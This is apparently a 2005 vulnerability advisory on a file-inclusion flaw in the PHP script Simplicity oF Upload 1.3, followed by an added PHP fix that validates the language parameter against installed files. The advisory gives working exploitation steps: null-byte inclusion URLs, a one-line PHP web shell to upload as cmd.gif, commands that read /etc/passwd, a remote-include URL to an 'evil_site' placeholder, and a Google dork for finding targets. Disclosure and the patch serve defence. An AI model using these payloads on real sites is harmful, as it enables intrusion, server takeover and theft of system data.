`
26/07/2005 16.09.18

Simplicity OF Upload 1.3 (possibly prior versions) remote code execution
& cross site scripting

software:
author site: http://www.phpsimplicity.com/scripts.php?id=3

remote commands execution:

problem at line 25-30:
...
//check for language overriding..
if (isset($_GET['language']))
    $language = strtolower($_GET['language']);

//now we include the language file
require_once("$language.lng");
...

you can include any file by adding a null byte to the "language" parameter value:

example:
http://localhost:30/simply/download.php?language=upload.php%00

you will see upload & download page together :)

so you can upload a cmd.gif file (when you upload a .php file, usually it is
renamed to .html...) with this php code inside to execute
commands:

<?php

system($HTTP_GET_VARS[command]);

?>

then try this url:

http://[target]/[path]/download.php?language=cmd.gif%00&command=ls

to list directories

http://[target]/[path]/download.php?language=cmd.gif%00&command=cat%20/etc/passwd

to show /etc/passwd file

cross site scripting:

also, a remote user can supply a specially crafted URL to redirect other people
to an evil page:

http://[target]/[path]/download.php?language=http://[evil_site]/[evil_page]%00

googledork:

"Powered By: Simplicity oF Upload"

rgod
email: rgod[at]autistici.org
site: http://rgod.altervista.org
original advisory: http://rgod.altervista.org/simply.html
`
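
The `require_once("$language.lng")` pattern quoted in the advisory, rewritten so that the request value can only select a language file that is already installed. This is an added example, not part of the original advisory or of the application's code; the `lang/` directory, the `english` default and the function name `resolve_language_file` are assumptions.

```php
<?php
// Added example, not Simplicity oF Upload code. Assumptions: language files
// live in ./lang/, the default language is "english", PHP 7.1 or later.

const LANG_DIR = __DIR__ . '/lang';
const DEFAULT_LANGUAGE = 'english';

/**
 * Map a request value to a language file inside $langDir.
 * Returns null when the value is not an installed language.
 */
function resolve_language_file($requested, string $langDir = LANG_DIR): ?string
{
    if (!is_string($requested)) {
        return null;                       // language[]=x arrives as an array
    }
    $name = strtolower($requested);
    // Letters, digits, '_' and '-' only: no NUL byte, dot, slash or "scheme://".
    if (!preg_match('/\A[a-z0-9_-]{1,32}\z/', $name)) {
        return null;
    }
    // The allowlist comes from the files on disk, never from the request.
    $installed = array_map(
        function ($path) { return basename($path, '.lng'); },
        glob($langDir . '/*.lng') ?: []
    );
    return in_array($name, $installed, true)
        ? $langDir . '/' . $name . '.lng'
        : null;
}

if (PHP_SAPI === 'cli') {
    // Constructed inputs shaped like the values in the advisory; each one
    // is rejected by the pattern check before any path is built.
    $samples = ["upload.php\0", "cmd.gif\0", "http://example.invalid/page\0", "../../etc/passwd"];
    foreach ($samples as $value) {
        var_dump(resolve_language_file($value));
    }
} else {
    // Web request: fall back to the default language on any rejected value.
    $file = resolve_language_file($_GET['language'] ?? DEFAULT_LANGUAGE)
        ?? LANG_DIR . '/' . DEFAULT_LANGUAGE . '.lng';
    require_once $file;
}
```

Because the value is matched against names found on disk, the appended `.lng` suffix is no longer the only thing separating request data from the include path.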